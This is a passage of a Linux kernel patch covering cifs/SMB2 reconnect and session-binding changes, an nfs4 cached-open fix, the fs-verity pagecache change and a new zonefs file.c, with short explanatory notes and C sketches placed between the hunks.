++			return -ERESTARTSYS;
++		}
++
++		/* are we still trying to reconnect? */
++		spin_lock(&server->srv_lock);
++		if (server->tcpStatus != CifsNeedReconnect) {
++			spin_unlock(&server->srv_lock);
++			return 0;
++		}
++		spin_unlock(&server->srv_lock);
++	} while (retry);
++
++	cifs_dbg(FYI, "%s: gave up waiting on reconnect\n", __func__);
++	return -EHOSTDOWN;
++}
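
cifs_wait_for_server_reconnect() above waits 10 seconds per reconnect
target on each pass and loops only when retry is set, i.e. on hard
mounts. Since wait_event_interruptible_timeout() samples its condition
without holding srv_lock, the status is re-checked under the lock after
every wake-up. A generic sketch of that pattern, not cifs code:

	#include <linux/errno.h>
	#include <linux/sched.h>
	#include <linux/spinlock.h>
	#include <linux/wait.h>

	static int demo_wait(wait_queue_head_t *wq, spinlock_t *lock,
			     bool *cond, bool retry)
	{
		long rem;

		do {
			/* <0: signal; 0: timed out; >0: condition seen true */
			rem = wait_event_interruptible_timeout(*wq, *cond,
							       10 * HZ);
			if (rem < 0)
				return -ERESTARTSYS;

			/* re-check under the lock: the wait macro read
			 * *cond without holding it */
			spin_lock(lock);
			if (*cond) {
				spin_unlock(lock);
				return 0;
			}
			spin_unlock(lock);
		} while (retry);	/* hard mounts keep waiting */

		return -EHOSTDOWN;	/* soft mounts give up after one pass */
	}
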
+diff --git a/fs/cifs/smb2pdu.c b/fs/cifs/smb2pdu.c
+index 6e6e44d8b4c79..b37379b62cc77 100644
+--- a/fs/cifs/smb2pdu.c
++++ b/fs/cifs/smb2pdu.c
+@@ -139,72 +139,12 @@ out:
+ 	return;
+ }
+ 
+-static int wait_for_server_reconnect(struct TCP_Server_Info *server,
+-				     __le16 smb2_command, bool retry)
+-{
+-	int timeout = 10;
+-	int rc;
+-
+-	spin_lock(&server->srv_lock);
+-	if (server->tcpStatus != CifsNeedReconnect) {
+-		spin_unlock(&server->srv_lock);
+-		return 0;
+-	}
+-	timeout *= server->nr_targets;
+-	spin_unlock(&server->srv_lock);
+-
+-	/*
+-	 * Return to caller for TREE_DISCONNECT and LOGOFF and CLOSE
+-	 * here since they are implicitly done when session drops.
+-	 */
+-	switch (smb2_command) {
+-	/*
+-	 * BB Should we keep oplock break and add flush to exceptions?
+-	 */
+-	case SMB2_TREE_DISCONNECT:
+-	case SMB2_CANCEL:
+-	case SMB2_CLOSE:
+-	case SMB2_OPLOCK_BREAK:
+-		return -EAGAIN;
+-	}
+-
+-	/*
+-	 * Give demultiplex thread up to 10 seconds to each target available for
+-	 * reconnect -- should be greater than cifs socket timeout which is 7
+-	 * seconds.
+-	 *
+-	 * On "soft" mounts we wait once. Hard mounts keep retrying until
+-	 * process is killed or server comes back on-line.
+-	 */
+-	do {
+-		rc = wait_event_interruptible_timeout(server->response_q,
+-						      (server->tcpStatus != CifsNeedReconnect),
+-						      timeout * HZ);
+-		if (rc < 0) {
+-			cifs_dbg(FYI, "%s: aborting reconnect due to received signal\n",
+-				 __func__);
+-			return -ERESTARTSYS;
+-		}
+-
+-		/* are we still trying to reconnect? */
+-		spin_lock(&server->srv_lock);
+-		if (server->tcpStatus != CifsNeedReconnect) {
+-			spin_unlock(&server->srv_lock);
+-			return 0;
+-		}
+-		spin_unlock(&server->srv_lock);
+-	} while (retry);
+-
+-	cifs_dbg(FYI, "%s: gave up waiting on reconnect\n", __func__);
+-	return -EHOSTDOWN;
+-}
+-
+ static int
+ smb2_reconnect(__le16 smb2_command, struct cifs_tcon *tcon,
+ 	       struct TCP_Server_Info *server)
+ {
+ 	int rc = 0;
+-	struct nls_table *nls_codepage;
++	struct nls_table *nls_codepage = NULL;
+ 	struct cifs_ses *ses;
+ 
+ 	/*
+@@ -239,7 +179,28 @@ smb2_reconnect(__le16 smb2_command, struct cifs_tcon *tcon,
+ 	    (!tcon->ses->server) || !server)
+ 		return -EIO;
+ 
+-	rc = wait_for_server_reconnect(server, smb2_command, tcon->retry);
++	spin_lock(&server->srv_lock);
++	if (server->tcpStatus == CifsNeedReconnect) {
++		/*
++		 * Return to caller for TREE_DISCONNECT and LOGOFF and CLOSE
++		 * here since they are implicitly done when session drops.
++		 */
++		switch (smb2_command) {
++		/*
++		 * BB Should we keep oplock break and add flush to exceptions?
++		 */
++		case SMB2_TREE_DISCONNECT:
++		case SMB2_CANCEL:
++		case SMB2_CLOSE:
++		case SMB2_OPLOCK_BREAK:
++			spin_unlock(&server->srv_lock);
++			return -EAGAIN;
++		}
++	}
++	spin_unlock(&server->srv_lock);
++
++again:
++	rc = cifs_wait_for_server_reconnect(server, tcon->retry);
+ 	if (rc)
+ 		return rc;
+ 
+@@ -255,8 +216,7 @@ smb2_reconnect(__le16 smb2_command, struct cifs_tcon *tcon,
+ 		 tcon->ses->chans_need_reconnect,
+ 		 tcon->need_reconnect);
+ 
+-	nls_codepage = load_nls_default();
+-
++	mutex_lock(&ses->session_mutex);
+ 	/*
+ 	 * Recheck after acquire mutex. If another thread is negotiating
+ 	 * and the server never sends an answer the socket will be closed
+@@ -265,28 +225,38 @@ smb2_reconnect(__le16 smb2_command, struct cifs_tcon *tcon,
+ 	spin_lock(&server->srv_lock);
+ 	if (server->tcpStatus == CifsNeedReconnect) {
+ 		spin_unlock(&server->srv_lock);
++		mutex_unlock(&ses->session_mutex);
++
++		if (tcon->retry)
++			goto again;
++
+ 		rc = -EHOSTDOWN;
+ 		goto out;
+ 	}
+ 	spin_unlock(&server->srv_lock);
+ 
++	nls_codepage = load_nls_default();
++
+ 	/*
+ 	 * need to prevent multiple threads trying to simultaneously
+ 	 * reconnect the same SMB session
+ 	 */
++	spin_lock(&ses->ses_lock);
+ 	spin_lock(&ses->chan_lock);
+-	if (!cifs_chan_needs_reconnect(ses, server)) {
++	if (!cifs_chan_needs_reconnect(ses, server) &&
++	    ses->ses_status == SES_GOOD) {
+ 		spin_unlock(&ses->chan_lock);
+-
++		spin_unlock(&ses->ses_lock);
+ 		/* this means that we only need to tree connect */
+ 		if (tcon->need_reconnect)
+ 			goto skip_sess_setup;
+ 
++		mutex_unlock(&ses->session_mutex);
+ 		goto out;
+ 	}
+ 	spin_unlock(&ses->chan_lock);
++	spin_unlock(&ses->ses_lock);
+ 
+-	mutex_lock(&ses->session_mutex);
+ 	rc = cifs_negotiate_protocol(0, ses, server);
+ 	if (!rc) {
+ 		rc = cifs_setup_session(0, ses, server, nls_codepage);
+@@ -302,10 +272,8 @@ smb2_reconnect(__le16 smb2_command, struct cifs_tcon *tcon,
+ 		mutex_unlock(&ses->session_mutex);
+ 		goto out;
+ 	}
+-	mutex_unlock(&ses->session_mutex);
+ 
+ skip_sess_setup:
+-	mutex_lock(&ses->session_mutex);
+ 	if (!tcon->need_reconnect) {
+ 		mutex_unlock(&ses->session_mutex);
+ 		goto out;
+@@ -320,7 +288,7 @@ skip_sess_setup:
+ 	cifs_dbg(FYI, "reconnect tcon rc = %d\n", rc);
+ 	if (rc) {
+ 		/* If sess reconnected but tcon didn't, something strange ... */
+-		pr_warn_once("reconnect tcon failed rc = %d\n", rc);
++		cifs_dbg(VFS, "reconnect tcon failed rc = %d\n", rc);
+ 		goto out;
+ 	}
+ 
+@@ -1292,9 +1260,9 @@ SMB2_sess_alloc_buffer(struct SMB2_sess_data *sess_data)
+ 	if (rc)
+ 		return rc;
+ 
+-	spin_lock(&ses->chan_lock);
+-	is_binding = !CIFS_ALL_CHANS_NEED_RECONNECT(ses);
+-	spin_unlock(&ses->chan_lock);
++	spin_lock(&ses->ses_lock);
++	is_binding = (ses->ses_status == SES_GOOD);
++	spin_unlock(&ses->ses_lock);
+ 
+ 	if (is_binding) {
+ 		req->hdr.SessionId = cpu_to_le64(ses->Suid);
+@@ -1452,9 +1420,9 @@ SMB2_auth_kerberos(struct SMB2_sess_data *sess_data)
+ 		goto out_put_spnego_key;
+ 	}
+ 
+-	spin_lock(&ses->chan_lock);
+-	is_binding = !CIFS_ALL_CHANS_NEED_RECONNECT(ses);
+-	spin_unlock(&ses->chan_lock);
++	spin_lock(&ses->ses_lock);
++	is_binding = (ses->ses_status == SES_GOOD);
++	spin_unlock(&ses->ses_lock);
+ 
+ 	/* keep session key if binding */
+ 	if (!is_binding) {
+@@ -1578,9 +1546,9 @@ SMB2_sess_auth_rawntlmssp_negotiate(struct SMB2_sess_data *sess_data)
+ 
+ 	cifs_dbg(FYI, "rawntlmssp session setup challenge phase\n");
+ 
+-	spin_lock(&ses->chan_lock);
+-	is_binding = !CIFS_ALL_CHANS_NEED_RECONNECT(ses);
+-	spin_unlock(&ses->chan_lock);
++	spin_lock(&ses->ses_lock);
++	is_binding = (ses->ses_status == SES_GOOD);
++	spin_unlock(&ses->ses_lock);
+ 
+ 	/* keep existing ses id and flags if binding */
+ 	if (!is_binding) {
+@@ -1646,9 +1614,9 @@ SMB2_sess_auth_rawntlmssp_authenticate(struct SMB2_sess_data *sess_data)
+ 
+ 	rsp = (struct smb2_sess_setup_rsp *)sess_data->iov[0].iov_base;
+ 
+-	spin_lock(&ses->chan_lock);
+-	is_binding = !CIFS_ALL_CHANS_NEED_RECONNECT(ses);
+-	spin_unlock(&ses->chan_lock);
++	spin_lock(&ses->ses_lock);
++	is_binding = (ses->ses_status == SES_GOOD);
++	spin_unlock(&ses->ses_lock);
+ 
+ 	/* keep existing ses id and flags if binding */
+ 	if (!is_binding) {
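
Two structural changes stand out in the smb2pdu.c hunks above: the
binding test now reads ses_status under ses_lock (a session setup sent
while the session is already SES_GOOD can only be a new channel being
bound), and smb2_reconnect() gains an again: label so that hard mounts
go back to waiting when the server drops mid-reconnect instead of
returning -EHOSTDOWN. A compressed sketch of that retry shape, where
demo_srv, wait_for_srv() and srv_dropped() are hypothetical stand-ins
for the real types and status checks:

	static int demo_reconnect(struct demo_srv *srv,
				  struct mutex *sess_mutex, bool retry)
	{
		int rc;

	again:
		rc = wait_for_srv(srv, retry);	/* cifs_wait_for_server_reconnect() */
		if (rc)
			return rc;

		mutex_lock(sess_mutex);
		if (srv_dropped(srv)) {	/* tcpStatus == CifsNeedReconnect */
			mutex_unlock(sess_mutex);
			if (retry)
				goto again;	/* hard mount: wait again */
			return -EHOSTDOWN;	/* soft mount: give up */
		}
		/* ... negotiate, session setup, tree connect ... */
		mutex_unlock(sess_mutex);
		return 0;
	}
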
+diff --git a/fs/cifs/smb2transport.c b/fs/cifs/smb2transport.c
+index d827b7547ffad..790acf65a0926 100644
+--- a/fs/cifs/smb2transport.c
++++ b/fs/cifs/smb2transport.c
+@@ -81,6 +81,7 @@ int smb2_get_sign_key(__u64 ses_id, struct TCP_Server_Info *server, u8 *key)
+ 	struct cifs_ses *ses = NULL;
+ 	int i;
+ 	int rc = 0;
++	bool is_binding = false;
+ 
+ 	spin_lock(&cifs_tcp_ses_lock);
+ 
+@@ -97,9 +98,12 @@ int smb2_get_sign_key(__u64 ses_id, struct TCP_Server_Info *server, u8 *key)
+ 	goto out;
+ 
+ found:
++	spin_lock(&ses->ses_lock);
+ 	spin_lock(&ses->chan_lock);
+-	if (cifs_chan_needs_reconnect(ses, server) &&
+-	    !CIFS_ALL_CHANS_NEED_RECONNECT(ses)) {
++
++	is_binding = (cifs_chan_needs_reconnect(ses, server) &&
++		      ses->ses_status == SES_GOOD);
++	if (is_binding) {
+ 		/*
+ 		 * If we are in the process of binding a new channel
+ 		 * to an existing session, use the master connection
+@@ -107,6 +111,7 @@ found:
+ 		 */
+ 		memcpy(key, ses->smb3signingkey, SMB3_SIGN_KEY_SIZE);
+ 		spin_unlock(&ses->chan_lock);
++		spin_unlock(&ses->ses_lock);
+ 		goto out;
+ 	}
+ 
+@@ -119,10 +124,12 @@ found:
+ 		if (chan->server == server) {
+ 			memcpy(key, chan->signkey, SMB3_SIGN_KEY_SIZE);
+ 			spin_unlock(&ses->chan_lock);
++			spin_unlock(&ses->ses_lock);
+ 			goto out;
+ 		}
+ 	}
+ 	spin_unlock(&ses->chan_lock);
++	spin_unlock(&ses->ses_lock);
+ 
+ 	cifs_dbg(VFS,
+ 		 "%s: Could not find channel signing key for session 0x%llx\n",
+@@ -392,11 +399,15 @@ generate_smb3signingkey(struct cifs_ses *ses,
+ 	bool is_binding = false;
+ 	int chan_index = 0;
+ 
++	spin_lock(&ses->ses_lock);
+ 	spin_lock(&ses->chan_lock);
+-	is_binding = !CIFS_ALL_CHANS_NEED_RECONNECT(ses);
++	is_binding = (cifs_chan_needs_reconnect(ses, server) &&
++		      ses->ses_status == SES_GOOD);
++
+ 	chan_index = cifs_ses_get_chan_index(ses, server);
+ 	/* TODO: introduce ref counting for channels when the can be freed */
+ 	spin_unlock(&ses->chan_lock);
++	spin_unlock(&ses->ses_lock);
+ 
+ 	/*
+ 	 * All channels use the same encryption/decryption keys but
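
The signing-key lookups above all follow the same rule: while a new
channel is being bound to an established (SES_GOOD) session, requests
are signed with the session's master key; once the channel is up, its
own per-channel key is used. Reduced to its core, with the
ses_lock/chan_lock pairing and the ses->chans[] walk elided, and with
demo structs standing in for the real ones (SMB3_SIGN_KEY_SIZE is 16
in the kernel headers):

	#include <linux/string.h>
	#include <linux/types.h>

	#define DEMO_SIGN_KEY_SIZE 16	/* matches SMB3_SIGN_KEY_SIZE */

	struct demo_ses  { u8 smb3signingkey[DEMO_SIGN_KEY_SIZE]; };
	struct demo_chan { u8 signkey[DEMO_SIGN_KEY_SIZE]; };

	static void demo_pick_key(u8 *key, const struct demo_ses *ses,
				  const struct demo_chan *chan,
				  bool is_binding)
	{
		if (is_binding)
			/* channel still binding: use the master session key */
			memcpy(key, ses->smb3signingkey, DEMO_SIGN_KEY_SIZE);
		else
			/* established channel: use its own signing key */
			memcpy(key, chan->signkey, DEMO_SIGN_KEY_SIZE);
	}
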
+diff --git a/fs/nfs/nfs4proc.c b/fs/nfs/nfs4proc.c
+index 4214286e01450..4f4ef7aa2f4a0 100644
+--- a/fs/nfs/nfs4proc.c
++++ b/fs/nfs/nfs4proc.c
+@@ -1980,8 +1980,7 @@ _nfs4_opendata_reclaim_to_nfs4_state(struct nfs4_opendata *data)
+ 	if (!data->rpc_done) {
+ 		if (data->rpc_status)
+ 			return ERR_PTR(data->rpc_status);
+-		/* cached opens have already been processed */
+-		goto update;
++		return nfs4_try_open_cached(data);
+ 	}
+ 
+ 	ret = nfs_refresh_inode(inode, &data->f_attr);
+@@ -1990,7 +1989,7 @@ _nfs4_opendata_reclaim_to_nfs4_state(struct nfs4_opendata *data)
+ 
+ 	if (data->o_res.delegation_type != 0)
+ 		nfs4_opendata_check_deleg(data, state);
+-update:
++
+ 	if (!update_open_stateid(state, &data->o_res.stateid,
+ 				NULL, data->o_arg.fmode))
+ 		return ERR_PTR(-EAGAIN);
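
The nfs4proc.c hunk is small but subtle: an open whose RPC never
completed (rpc_done false and no error) is a cached open, and it now
goes through nfs4_try_open_cached() rather than falling through to
update_open_stateid() with a stateid that was never filled in. The
resulting control flow, as a sketch:

	/* _nfs4_opendata_reclaim_to_nfs4_state() after this change:
	 *
	 *   !rpc_done && rpc_status  -> ERR_PTR(rpc_status)
	 *   !rpc_done && !rpc_status -> nfs4_try_open_cached(data)
	 *   rpc_done                 -> nfs_refresh_inode(),
	 *                               nfs4_opendata_check_deleg(),
	 *                               update_open_stateid()
	 */
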
+diff --git a/fs/verity/enable.c b/fs/verity/enable.c
+index df6b499bf6a14..400c264bf8930 100644
+--- a/fs/verity/enable.c
++++ b/fs/verity/enable.c
+@@ -390,25 +390,27 @@ int fsverity_ioctl_enable(struct file *filp, const void __user *uarg)
+ 		goto out_drop_write;
+ 
+ 	err = enable_verity(filp, &arg);
+-	if (err)
+-		goto out_allow_write_access;
+ 
+ 	/*
+-	 * Some pages of the file may have been evicted from pagecache after
+-	 * being used in the Merkle tree construction, then read into pagecache
+-	 * again by another process reading from the file concurrently.  Since
+-	 * these pages didn't undergo verification against the file digest which
+-	 * fs-verity now claims to be enforcing, we have to wipe the pagecache
+-	 * to ensure that all future reads are verified.
++	 * We no longer drop the inode's pagecache after enabling verity.  This
++	 * used to be done to try to avoid a race condition where pages could be
++	 * evicted after being used in the Merkle tree construction, then
++	 * re-instantiated by a concurrent read.  Such pages are unverified, and
++	 * the backing storage could have filled them with different content, so
++	 * they shouldn't be used to fulfill reads once verity is enabled.
++	 *
++	 * But, dropping the pagecache has a big performance impact, and it
++	 * doesn't fully solve the race condition anyway.  So for those reasons,
++	 * and also because this race condition isn't very important relatively
++	 * speaking (especially for small-ish files, where the chance of a page
++	 * being used, evicted, *and* re-instantiated all while enabling verity
++	 * is quite small), we no longer drop the inode's pagecache.
+ 	 */
+-	filemap_write_and_wait(inode->i_mapping);
+-	invalidate_inode_pages2(inode->i_mapping);
+ 
+ 	/*
+ 	 * allow_write_access() is needed to pair with deny_write_access().
+ 	 * Regardless, the filesystem won't allow writing to verity files.
+ 	 */
+-out_allow_write_access:
+ 	allow_write_access(filp);
+ out_drop_write:
+ 	mnt_drop_write_file(filp);
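
For reference, the two calls deleted from fsverity_ioctl_enable() above
are what used to wipe the pagecache after enable_verity() succeeded;
the new comment block explains why the wipe was dropped (a large cost
for an incomplete fix to a narrow race):

	/* old behavior, removed by this patch: */
	filemap_write_and_wait(inode->i_mapping);	/* flush dirty pages */
	invalidate_inode_pages2(inode->i_mapping);	/* drop cached pages */
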
+diff --git a/fs/zonefs/Makefile b/fs/zonefs/Makefile
+index 9fe54f5319f22..645f7229de4a0 100644
+--- a/fs/zonefs/Makefile
++++ b/fs/zonefs/Makefile
+@@ -3,4 +3,4 @@ ccflags-y				+= -I$(src)
+ 
+ obj-$(CONFIG_ZONEFS_FS) += zonefs.o
+ 
+-zonefs-y	:= super.o sysfs.o
++zonefs-y	:= super.o file.o sysfs.o
+diff --git a/fs/zonefs/file.c b/fs/zonefs/file.c
+new file mode 100644
+index 0000000000000..63cd50840419c
+--- /dev/null
++++ b/fs/zonefs/file.c
+@@ -0,0 +1,902 @@
++// SPDX-License-Identifier: GPL-2.0
++/*
++ * Simple file system for zoned block devices exposing zones as files.
++ *
++ * Copyright (C) 2022 Western Digital Corporation or its affiliates.
++ */
++#include <linux/module.h>
++#include <linux/pagemap.h>
++#include <linux/iomap.h>
++#include <linux/init.h>
++#include <linux/slab.h>
++#include <linux/blkdev.h>
++#include <linux/statfs.h>
++#include <linux/writeback.h>
++#include <linux/quotaops.h>
++#include <linux/seq_file.h>
++#include <linux/parser.h>
++#include <linux/uio.h>
++#include <linux/mman.h>
++#include <linux/sched/mm.h>
++#include <linux/task_io_accounting_ops.h>
++
++#include "zonefs.h"
++
++#include "trace.h"
++
++static int zonefs_read_iomap_begin(struct inode *inode, loff_t offset,
++				   loff_t length, unsigned int flags,
++				   struct iomap *iomap, struct iomap *srcmap)
++{
++	struct zonefs_inode_info *zi = ZONEFS_I(inode);
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
++	struct super_block *sb = inode->i_sb;
++	loff_t isize;
++
++	/*
++	 * All blocks are always mapped below EOF. If reading past EOF,
++	 * act as if there is a hole up to the file maximum size.
++	 */
++	mutex_lock(&zi->i_truncate_mutex);
++	iomap->bdev = inode->i_sb->s_bdev;
++	iomap->offset = ALIGN_DOWN(offset, sb->s_blocksize);
++	isize = i_size_read(inode);
++	if (iomap->offset >= isize) {
++		iomap->type = IOMAP_HOLE;
++		iomap->addr = IOMAP_NULL_ADDR;
++		iomap->length = length;
++	} else {
++		iomap->type = IOMAP_MAPPED;
++		iomap->addr = (z->z_sector << SECTOR_SHIFT) + iomap->offset;
++		iomap->length = isize - iomap->offset;
++	}
++	mutex_unlock(&zi->i_truncate_mutex);
++
++	trace_zonefs_iomap_begin(inode, iomap);
++
++	return 0;
++}
++
++static const struct iomap_ops zonefs_read_iomap_ops = {
++	.iomap_begin	= zonefs_read_iomap_begin,
++};
++
++static int zonefs_write_iomap_begin(struct inode *inode, loff_t offset,
++				    loff_t length, unsigned int flags,
++				    struct iomap *iomap, struct iomap *srcmap)
++{
++	struct zonefs_inode_info *zi = ZONEFS_I(inode);
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
++	struct super_block *sb = inode->i_sb;
++	loff_t isize;
++
++	/* All write I/Os should always be within the file maximum size */
++	if (WARN_ON_ONCE(offset + length > z->z_capacity))
++		return -EIO;
++
++	/*
++	 * Sequential zones can only accept direct writes. This is already
++	 * checked when writes are issued, so warn if we see a page writeback
++	 * operation.
++	 */
++	if (WARN_ON_ONCE(zonefs_zone_is_seq(z) && !(flags & IOMAP_DIRECT)))
++		return -EIO;
++
++	/*
++	 * For conventional zones, all blocks are always mapped. For sequential
++	 * zones, all blocks are always mapped below the inode size (zone
++	 * write pointer) and unwritten beyond.
++	 */
++	mutex_lock(&zi->i_truncate_mutex);
++	iomap->bdev = inode->i_sb->s_bdev;
++	iomap->offset = ALIGN_DOWN(offset, sb->s_blocksize);
++	iomap->addr = (z->z_sector << SECTOR_SHIFT) + iomap->offset;
++	isize = i_size_read(inode);
++	if (iomap->offset >= isize) {
++		iomap->type = IOMAP_UNWRITTEN;
++		iomap->length = z->z_capacity - iomap->offset;
++	} else {
++		iomap->type = IOMAP_MAPPED;
++		iomap->length = isize - iomap->offset;
++	}
++	mutex_unlock(&zi->i_truncate_mutex);
++
++	trace_zonefs_iomap_begin(inode, iomap);
++
++	return 0;
++}
++
++static const struct iomap_ops zonefs_write_iomap_ops = {
++	.iomap_begin	= zonefs_write_iomap_begin,
++};
++
++static int zonefs_read_folio(struct file *unused, struct folio *folio)
++{
++	return iomap_read_folio(folio, &zonefs_read_iomap_ops);
++}
++
++static void zonefs_readahead(struct readahead_control *rac)
++{
++	iomap_readahead(rac, &zonefs_read_iomap_ops);
++}
++
++/*
++ * Map blocks for page writeback. This is used only on conventional zone files,
++ * which implies that the page range can only be within the fixed inode size.
++ */
++static int zonefs_write_map_blocks(struct iomap_writepage_ctx *wpc,
++				   struct inode *inode, loff_t offset)
++{
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
++
++	if (WARN_ON_ONCE(zonefs_zone_is_seq(z)))
++		return -EIO;
++	if (WARN_ON_ONCE(offset >= i_size_read(inode)))
++		return -EIO;
++
++	/* If the mapping is already OK, nothing needs to be done */
++	if (offset >= wpc->iomap.offset &&
++	    offset < wpc->iomap.offset + wpc->iomap.length)
++		return 0;
++
++	return zonefs_write_iomap_begin(inode, offset,
++					z->z_capacity - offset,
++					IOMAP_WRITE, &wpc->iomap, NULL);
++}
++
++static const struct iomap_writeback_ops zonefs_writeback_ops = {
++	.map_blocks		= zonefs_write_map_blocks,
++};
++
++static int zonefs_writepages(struct address_space *mapping,
++			     struct writeback_control *wbc)
++{
++	struct iomap_writepage_ctx wpc = { };
++
++	return iomap_writepages(mapping, wbc, &wpc, &zonefs_writeback_ops);
++}
++
++static int zonefs_swap_activate(struct swap_info_struct *sis,
++				struct file *swap_file, sector_t *span)
++{
++	struct inode *inode = file_inode(swap_file);
++
++	if (zonefs_inode_is_seq(inode)) {
++		zonefs_err(inode->i_sb,
++			   "swap file: not a conventional zone file\n");
++		return -EINVAL;
++	}
++
++	return iomap_swapfile_activate(sis, swap_file, span,
++				       &zonefs_read_iomap_ops);
++}
++
++const struct address_space_operations zonefs_file_aops = {
++	.read_folio		= zonefs_read_folio,
++	.readahead		= zonefs_readahead,
++	.writepages		= zonefs_writepages,
++	.dirty_folio		= filemap_dirty_folio,
++	.release_folio		= iomap_release_folio,
++	.invalidate_folio	= iomap_invalidate_folio,
++	.migrate_folio		= filemap_migrate_folio,
++	.is_partially_uptodate	= iomap_is_partially_uptodate,
++	.error_remove_page	= generic_error_remove_page,
++	.direct_IO		= noop_direct_IO,
++	.swap_activate		= zonefs_swap_activate,
++};
++
++int zonefs_file_truncate(struct inode *inode, loff_t isize)
++{
++	struct zonefs_inode_info *zi = ZONEFS_I(inode);
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
++	loff_t old_isize;
++	enum req_op op;
++	int ret = 0;
++
++	/*
++	 * Only sequential zone files can be truncated and truncation is allowed
++	 * only down to a 0 size, which is equivalent to a zone reset, and to
++	 * the maximum file size, which is equivalent to a zone finish.
++	 */
++	if (!zonefs_zone_is_seq(z))
++		return -EPERM;
++
++	if (!isize)
++		op = REQ_OP_ZONE_RESET;
++	else if (isize == z->z_capacity)
++		op = REQ_OP_ZONE_FINISH;
++	else
++		return -EPERM;
++
++	inode_dio_wait(inode);
++
++	/* Serialize against page faults */
++	filemap_invalidate_lock(inode->i_mapping);
++
++	/* Serialize against zonefs_iomap_begin() */
++	mutex_lock(&zi->i_truncate_mutex);
++
++	old_isize = i_size_read(inode);
++	if (isize == old_isize)
++		goto unlock;
++
++	ret = zonefs_inode_zone_mgmt(inode, op);
++	if (ret)
++		goto unlock;
++
++	/*
++	 * If the mount option ZONEFS_MNTOPT_EXPLICIT_OPEN is set,
++	 * take care of open zones.
++	 */
++	if (z->z_flags & ZONEFS_ZONE_OPEN) {
++		/*
++		 * Truncating a zone to EMPTY or FULL is the equivalent of
++		 * closing the zone. For a truncation to 0, we need to
++		 * re-open the zone to ensure new writes can be processed.
++		 * For a truncation to the maximum file size, the zone is
++		 * closed and writes cannot be accepted anymore, so clear
++		 * the open flag.
++		 */
++		if (!isize)
++			ret = zonefs_inode_zone_mgmt(inode, REQ_OP_ZONE_OPEN);
++		else
++			z->z_flags &= ~ZONEFS_ZONE_OPEN;
++	}
++
++	zonefs_update_stats(inode, isize);
++	truncate_setsize(inode, isize);
++	z->z_wpoffset = isize;
++	zonefs_inode_account_active(inode);
++
++unlock:
++	mutex_unlock(&zi->i_truncate_mutex);
++	filemap_invalidate_unlock(inode->i_mapping);
++
++	return ret;
++}
++
++static int zonefs_file_fsync(struct file *file, loff_t start, loff_t end,
++			     int datasync)
++{
++	struct inode *inode = file_inode(file);
++	int ret = 0;
++
++	if (unlikely(IS_IMMUTABLE(inode)))
++		return -EPERM;
++
++	/*
++	 * Since only direct writes are allowed in sequential files, page cache
++	 * flush is needed only for conventional zone files.
++	 */
++	if (zonefs_inode_is_cnv(inode))
++		ret = file_write_and_wait_range(file, start, end);
++	if (!ret)
++		ret = blkdev_issue_flush(inode->i_sb->s_bdev);
++
++	if (ret)
++		zonefs_io_error(inode, true);
++
++	return ret;
++}
++
++static vm_fault_t zonefs_filemap_page_mkwrite(struct vm_fault *vmf)
++{
++	struct inode *inode = file_inode(vmf->vma->vm_file);
++	vm_fault_t ret;
++
++	if (unlikely(IS_IMMUTABLE(inode)))
++		return VM_FAULT_SIGBUS;
++
++	/*
++	 * Sanity check: only conventional zone files can have shared
++	 * writeable mappings.
++	 */
++	if (zonefs_inode_is_seq(inode))
++		return VM_FAULT_NOPAGE;
++
++	sb_start_pagefault(inode->i_sb);
++	file_update_time(vmf->vma->vm_file);
++
++	/* Serialize against truncates */
++	filemap_invalidate_lock_shared(inode->i_mapping);
++	ret = iomap_page_mkwrite(vmf, &zonefs_write_iomap_ops);
++	filemap_invalidate_unlock_shared(inode->i_mapping);
++
++	sb_end_pagefault(inode->i_sb);
++	return ret;
++}
++
++static const struct vm_operations_struct zonefs_file_vm_ops = {
++	.fault		= filemap_fault,
++	.map_pages	= filemap_map_pages,
++	.page_mkwrite	= zonefs_filemap_page_mkwrite,
++};
++
++static int zonefs_file_mmap(struct file *file, struct vm_area_struct *vma)
++{
++	/*
++	 * Conventional zones accept random writes, so their files can support
++	 * shared writable mappings. For sequential zone files, only read
++	 * mappings are possible since there are no guarantees for write
++	 * ordering between msync() and page cache writeback.
++	 */
++	if (zonefs_inode_is_seq(file_inode(file)) &&
++	    (vma->vm_flags & VM_SHARED) && (vma->vm_flags & VM_MAYWRITE))
++		return -EINVAL;
++
++	file_accessed(file);
++	vma->vm_ops = &zonefs_file_vm_ops;
++
++	return 0;
++}
++
++static loff_t zonefs_file_llseek(struct file *file, loff_t offset, int whence)
++{
++	loff_t isize = i_size_read(file_inode(file));
++
++	/*
++	 * Seeks are limited to below the zone size for conventional zones
++	 * and below the zone write pointer for sequential zones. In both
++	 * cases, this limit is the inode size.
++	 */
++	return generic_file_llseek_size(file, offset, whence, isize, isize);
++}
++
++static int zonefs_file_write_dio_end_io(struct kiocb *iocb, ssize_t size,
++					int error, unsigned int flags)
++{
++	struct inode *inode = file_inode(iocb->ki_filp);
++	struct zonefs_inode_info *zi = ZONEFS_I(inode);
++
++	if (error) {
++		zonefs_io_error(inode, true);
++		return error;
++	}
++
++	if (size && zonefs_inode_is_seq(inode)) {
++		/*
++		 * Note that we may be seeing completions out of order,
++		 * but that is not a problem since a write completed
++		 * successfully necessarily means that all preceding writes
++		 * were also successful. So we can safely increase the inode
++		 * size to the write end location.
++		 */
++		mutex_lock(&zi->i_truncate_mutex);
++		if (i_size_read(inode) < iocb->ki_pos + size) {
++			zonefs_update_stats(inode, iocb->ki_pos + size);
++			zonefs_i_size_write(inode, iocb->ki_pos + size);
++		}
++		mutex_unlock(&zi->i_truncate_mutex);
++	}
++
++	return 0;
++}
++
++static const struct iomap_dio_ops zonefs_write_dio_ops = {
++	.end_io			= zonefs_file_write_dio_end_io,
++};
++
++static ssize_t zonefs_file_dio_append(struct kiocb *iocb, struct iov_iter *from)
++{
++	struct inode *inode = file_inode(iocb->ki_filp);
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
++	struct block_device *bdev = inode->i_sb->s_bdev;
++	unsigned int max = bdev_max_zone_append_sectors(bdev);
++	pgoff_t start, end;
++	struct bio *bio;
++	ssize_t size;
++	int nr_pages;
++	ssize_t ret;
++
++	max = ALIGN_DOWN(max << SECTOR_SHIFT, inode->i_sb->s_blocksize);
++	iov_iter_truncate(from, max);
++
++	/*
++	 * If the inode block size (zone write granularity) is smaller than the
++	 * page size, we may be appending data belonging to the last page of the
++	 * inode straddling inode->i_size, with that page already cached due to
++	 * a buffered read or readahead. So make sure to invalidate that page.
